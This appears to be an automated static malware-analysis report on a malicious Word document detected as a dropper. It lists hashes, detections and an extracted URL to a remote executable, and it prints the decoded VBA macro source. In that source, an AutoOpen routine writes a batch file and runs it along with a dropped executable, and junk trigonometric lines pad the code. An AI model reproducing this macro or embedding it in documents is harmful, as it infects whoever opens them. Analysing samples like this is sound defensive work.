Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 fd51463bd5345771…

MALICIOUS

Office (OOXML)

84.5 KB Created: 2020-01-13 01:40:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-05-25
MD5: 0fab1af13aa4bc52685fde4c3c1ffa98 SHA-1: 7898466a0ac7e10a78722a7d27e2cc0a3f3c286e SHA-256: fd51463bd534577173d121227c116d4c5d25fbbe497e762cf4acd497a4f9784d
150 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OOXML document containing a VBA project with an AutoOpen macro, indicating malicious intent. ClamAV detections confirm it as a dropper. The VBA script likely downloads and executes a secondary payload, a common tactic for malware distribution.

Heuristics 4

  • ClamAV: Doc.Dropper.Valyria-8011744-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Valyria-8011744-0
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub autoopen()
    On Error Resume Next
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.afboxmarket.com/masnd.exe In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 27441 bytes
SHA-256: 8ebbebe42eceef7c93fa205c0636e6d2c772b1fe27c3d3c39ece9ccb31ac3615
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EndTime"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Apple"
Option Explicit

Public Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

Public Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type



Public Const NORMAL_PRIORITY_CLASS = &H20&
Public Const INFINITE = -1&


Attribute VB_Name = "Potatoes"



Const MOVEFILE_REPLACE_EXISTING = &H1
Const FILE_ATTRIBUTE_TEMPORARY = &H100
Const FILE_BEGIN = 0
Const FILE_SHARE_READ = &H1
Const CREATE_ALWAYS = 2
Const OPEN_EXISTING = 4
Const GENERIC_READ = &H80000000
Const GENERIC_WRITE = &H40000000



Attribute VB_Name = "ClockFinished"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public sCurrentFile As String
Private Type ObjectProperties
  Name As String
  Caption As String
  ToolTip As String
End Type
Private Type FormProperties
  Name As String
  Caption As String
  ObjectCount As Integer
  ObjProp() As ObjectProperties
End Type

Private FormProp() As FormProperties
Private iFormCount As Integer
Sub LoadLanguagePack(sFile As String)
  Dim sLine As String, iPos As Integer, sTmp As String
  Dim sFormName As String, sTmp2 As String
  Dim bFormFound As Boolean
  sCurrentFile = sFile
  iFormCount = 0
  Open sFile For Input As #1
    Do
      Input #1, sLine
      If Left$(sLine, 1) = ";" Or sLine = "" Then GoTo Jump

      If Left$(sLine, 1) = "[" And Right$(sLine, 5) = ".End]" Then
        bFormFound = False: GoTo Jump
      End If
      If Left$(sLine, 1) = "[" And Right$(sLine, 1) = "]" Then
        bFormFound = True
        sFormName = Mid$(sLine, 2, Len(sLine) - 2)
        iFormCount = iFormCount + 1
        ReDim Preserve FormProp(iFormCount)
        FormProp(iFormCount).Name = sFormName: GoTo Jump
      End If
      
      If Left$(sLine, 7) = "Caption" Then
        sTmp = Mid$(sLine, InStr(sLine, "=") + 2)
        FormProp(iFormCount).Caption = Left$(sTmp, Len(sTmp) - 1)
        GoTo Jump
      End If
            iPos = InStr(sLine, ".Caption")
      
      If iPos > 0 And bFormFound Then
        FormProp(iFormCount).ObjectCount = FormProp(iFormCount).ObjectCount + 1
        ReDim Preserve FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount)
        sTmp = Left$(sLine, iPos - 1)
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).Name = sTmp
        sTmp = Mid$(sLine, InStr(sLine, "=") + 2)
      
        If Right$(sTmp, 1) <> Chr$(34) Then
          Do While Right$(sTmp, 1) <> Chr$(34)
            Input #1, sTmp2
            sTmp = sTmp & ", " & sTmp2
          Loop
        End If
        If Right$(sTmp, 1) = Chr$(34) Then sTmp = Left$(sTmp, Len(sTmp) - 1)
      
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).Caption = sTmp
        GoTo Jump
      End If
            iPos = InStr(sLine, ".ToolTip")
      If iPos > 0 And bFormFound Then
        sTmp = Left$(sLine, iPos - 1)
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).Name = sTmp
        sTmp = Mid$(sLine, InStr(sLine, "=") + 2)
      
        If Right$(sTmp, 1) <> Chr$(34) Then
          Do While Right$(sTmp, 1) <> Chr$(34)
            Input #1, sTmp2
            sTmp = sTmp & ", " & sTmp2
          Loop
        End If
        If Right$(sTmp, 1) = Chr$(34) Then sTmp = Left$(sTmp, Len(sTmp) - 1)
      
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).ToolTip = sTmp
        GoTo Jump
      End If
      
Jump:


    Loop Until EOF(1)

  Close #1

End Sub


Sub SetLanguageInForm(frmForm As Form)
  
  On Local Error Resume Next
  Dim i As Integer, j As Integer
  Dim iForm As Integer
  

  For i = 1 To iFormCount
    If FormProp(i).Name = frmForm.Name Then
      iForm = i
      Exit For
    End If
  Next i

  
  frmForm.Caption = FormProp(iForm).Caption
    For j = 1 To FormProp(iForm).ObjectCount
    frmForm.Controls(FormProp(iForm).ObjProp(j).Name).Caption = FormProp(iForm).ObjProp(j).Caption
    frmForm.Controls(FormProp(iForm).ObjProp(j).Name).TooltipText = FormProp(iForm).ObjProp(j).ToolTip
  Next j
  
End Sub

Function EnumLanguagePacks(sFolder As String, sExtension As String) As String

  If Not DirExists(sFolder) Then
    MsgBox sFolder & " doesn't exist.", vbCritical
    Exit Function
  End If
  
  Dim sTmp As String

  If Right$(sFolder, 1) <> "\" Then sFolder = sFolder & "\"
  sTmp = Dir$(sFolder & sExtension)
  If sTmp <> "" Then
    EnumLanguagePacks = sTmp
    sTmp = Dir$
    While Len(sTmp) > 0
      EnumLanguagePacks = EnumLanguagePacks & "|" & sTmp
      DoEvents
      sTmp = Dir$
    Wend
  End If

End Function


Private Function DirExists(ByVal strDirName As String) As Integer
    Const strWILDCARD$ = "*.*"

    Dim strDummy As String

    On Error Resume Next

    If Right$(strDirName, 1) <> "\" Then strDirName = strDirName & "\"
    strDummy = Dir$(strDirName & strWILDCARD, vbDirectory)
    DirExists = Not (strDummy = vbNullString)

    Err = 0
End Function


Sub CarregaPacotedeLinguagem(sArquivo As String)
  
  LoadLanguagePack sArquivo
  
End Sub

Sub SetaLinguagemnoForm(frmForm As Form)

  SetLanguageInForm frmForm

End Sub

Function EnumeraPacotesdeLinguagem(sDiretorio As String, sExtensao As String) As String
  
  EnumLanguagePacks sDiretorio, sExtensao
  
End Function



Attribute VB_Name = "Carrow"
Public mf As String


Function GetAssist() As Boolean
Dim lHandle

     mf = "C:\Jeropit"
    
    If Right(mf, 1) <> "\" Then
        mf = mf & "\"
        MakeSureDirectoryPathExists mf
    End If
    
        mf = "C:\Htyu"
    
    If Right(mf, 1) <> "\" Then
        mf = mf & "\"
        MakeSureDirectoryPathExists mf
    End If
    
    lHandle = CreateFileA("C:\Jeropit\Poteri.BAT", GENERIC_WRITE Or GENERIC_READ, _
                         &H2, 0, CREATE_ALWAYS, FILE_SHARE_WRITE, 0)
    
    If lHandle <> 0 Then CloseHandle lHandle

        mf = "C:\Htyu\Bioper"
    
    If Right(mf, 1) <> "\" Then
        mf = mf & "\"
        MakeSureDirectoryPathExists mf
    End If
    

        mf = "C:\Htyu\Bioper\Derip"
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
    If Right(mf, 1) <> "\" Then
        mf = mf & "\"
        MakeSureDirectoryPathExists mf
    End If
    

        mf = "C:\Deripoi"
    
    If Right(mf, 1) <> "\" Then
        mf = mf & "\"
        MakeSureDirectoryPathExists mf
    End If
    
    Open "C:\Jeropit\Poteri.BAT" For Output As #1
    Print #1, BlueControl.FAQ.Caption
    Close #1

    Testing
    
End Function
Sub autoopen()
On Error Resume Next
'The Food Storage & Distribution Federation
GetAssist
CopyToA
End Sub
Public Sub CopyToA()
    Dim docActive As Document
    Dim docNew As Document
    Dim rngActiveDocPart As Range
    Dim rngNewDocPart As Range
    Dim strDocName As String
    Dim Proc As PROCESS_INFORMATION
    Dim strTemplateName As String
    Dim start As STARTUPINFO
    Set docActive = ActiveDocument
    
    strDocName = docActive.Name
    strTemplateName = docActive.AttachedTemplate.FullName
    

    Set docNew = Documents.Add(strTemplateName)
    
 
    For Each rngActiveDocPart In docActive.StoryRanges
        Set rngNewDocPart = docNew.StoryRanges _
           (rngActiveDocPart.StoryType)
        rngActiveDocPart.Copy
                
   
        rngNewDocPart.Paste
    Next rngActiveDocPart
    
    docNew.Activate
 
    With Dialogs(wdDialogFileSaveAs)
        .Name = "" & strDocName
        .Show
    End With
End Sub




Attribute VB_Name = "BlueControl"
Attribute VB_Base = "0{D47C5792-41C1-405C-B043-B3681A137E2D}{E18FCDD9-6B32-44FB-8205-C980B056F78B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Attribute VB_Name = "cPalette"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "EnumsTip"

Public Sub ExecCmd(cmdline As String)
Dim Proc As PROCESS_INFORMATION
Dim start As STARTUPINFO
Dim ReturnValue

start.cb = Len(start)
start.dwFlags = 1&
ReturnValue = CreateProcessA(0&, cmdline$, 0&, 0&, 0&, _
NORMAL_PRIORITY_CLASS, 0&, 0&, start, Proc)

Do
ReturnValue = WaitForSingleObject(Proc.hProcess, 0)
DoEvents
Loop Until ReturnValue <> 258

ReturnValue = CloseHandle(Proc.hProcess)
End Sub

Public Function Testing() As Boolean
ExecCmd "C:\Jeropit\Poteri.BAT"
ExecCmd "C:\Htyu\Bioper\Gilen.exe"
End Function




Attribute VB_Name = "wDelcares"
#If VBA7 Then
Public Declare PtrSafe Function SetPixel Lib "gdi32" (ByVal hDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal crColor As LongPtr) As LongPtr
Public Declare PtrSafe Function DeleteDC Lib "gdi32" (ByVal hDC As LongPtr) As LongPtr
Public Declare PtrSafe Function GdiTransparentBlt Lib "gdi32.dll" (ByVal hDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hSrcDC As LongPtr, ByVal xSrc As LongPtr, ByVal ySrc As LongPtr, ByVal nSrcWidth As LongPtr, ByVal nSrcHeight As LongPtr, ByVal crTransparent As LongPtr) As Boolean
Public Declare PtrSafe Function MakeSureDirectoryPathExists Lib "imagehlp.dll" (ByVal lpPath As String) As LongPtr
Public Declare PtrSafe Function CreateFileA Lib "kernel32" (ByVal lpFileName As String, ByVal dwDesiredAccess As LongPtr, ByVal dwShareMode As LongPtr, ByVal lpSecurityAttributes As LongPtr, ByVal dwCreationDisposition As LongPtr, ByVal dwFlagsAndAttributes As LongPtr, ByVal hTemplateFile As LongPtr) As LongPtr
Public Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal hObject As LongPtr) As LongPtr
Public Declare PtrSafe Function CreateCompatibleDC Lib "gdi32" (ByVal hDC As LongPtr) As LongPtr
Public Declare PtrSafe Function WaitForSingleObject Lib "kernel32" (ByVal _
hHandle As LongPtr, ByVal dwMilliseconds As LongPtr) As LongPtr

Public Declare PtrSafe Function CreateProcessA Lib "kernel32" (ByVal _
lpApplicationName As LongPtr, ByVal lpCommandLine As String, ByVal _
lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, _
ByVal bInheritHandles As LongPtr, ByVal dwCreationFlags As LongPtr, _
ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As LongPtr, _
lpStartupInfo As STARTUPINFO, lpProcessInformation As _
PROCESS_INFORMATION) As LongPtr


Public Declare PtrSafe Function SetEnvironmentVariable Lib "kernel32" Alias "SetEnvironmentVariableA" (ByVal lpName As String, ByVal lpValue As String) As LongPtr
Public Declare PtrSafe Sub GetStartupInfoA Lib "kernel32" (lpStartupInfo As STARTUPINFO)
Public Declare PtrSafe Function GetEnvironmentVariable Lib "kernel32" Alias "GetEnvironmentVariableA" _
(ByVal lpName As String, ByVal lpBuffer As String, ByVal nSize As LongPtr) As LongPtr
Public Declare PtrSafe Function GetDC Lib "user32" (ByVal hwnd As LongPtr) As LongPtr
Public Declare PtrSafe Function DeleteObject Lib "gdi32" (ByVal hObject As LongPtr) As LongPtr
Public Declare PtrSafe Function SelectObject Lib "gdi32" (ByVal hDC As LongPtr, ByVal hObject As LongPtr) As LongPtr
Public Declare PtrSafe Function BitBlt Lib "gdi32" (ByVal hDestDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hSrcDC As LongPtr, ByVal xSrc As LongPtr, ByVal ySrc As LongPtr, ByVal dwRop As LongPtr) As LongPtr
Public Declare PtrSafe Function StretchBlt Lib "gdi32" (ByVal hDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hSrcDC As LongPtr, ByVal xSrc As LongPtr, ByVal ySrc As LongPtr, ByVal nSrcWidth As LongPtr, ByVal nSrcHeight As LongPtr, ByVal dwRop As LongPtr) As LongPtr
Public Declare PtrSafe Function GetStretchBltMode Lib "gdi32" (ByVal hDC As LongPtr) As LongPtr
Public Declare PtrSafe Function SetStretchBltMode Lib "gdi32" (ByVal hDC As LongPtr, ByVal nStretchMode As LongPtr) As LongPtr
#Else
Public Declare Function SetPixel Lib "gdi32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal crColor As Long) As Long
Public Declare Function CreateCompatibleDC Lib "gdi32" (ByVal hDC As Long) As Long
Public Declare Function DeleteDC Lib "gdi32" (ByVal hDC As Long) As Long
Public Declare Function GdiTransparentBlt Lib "gdi32.dll" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal nSrcWidth As Long, ByVal nSrcHeight As Long, ByVal crTransparent As Long) As Boolean
Public Declare Function MakeSureDirectoryPathExists Lib "imagehlp.dll" (ByVal lpPath As String) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function CreateFileA Lib "kernel32" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As LongPtr, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
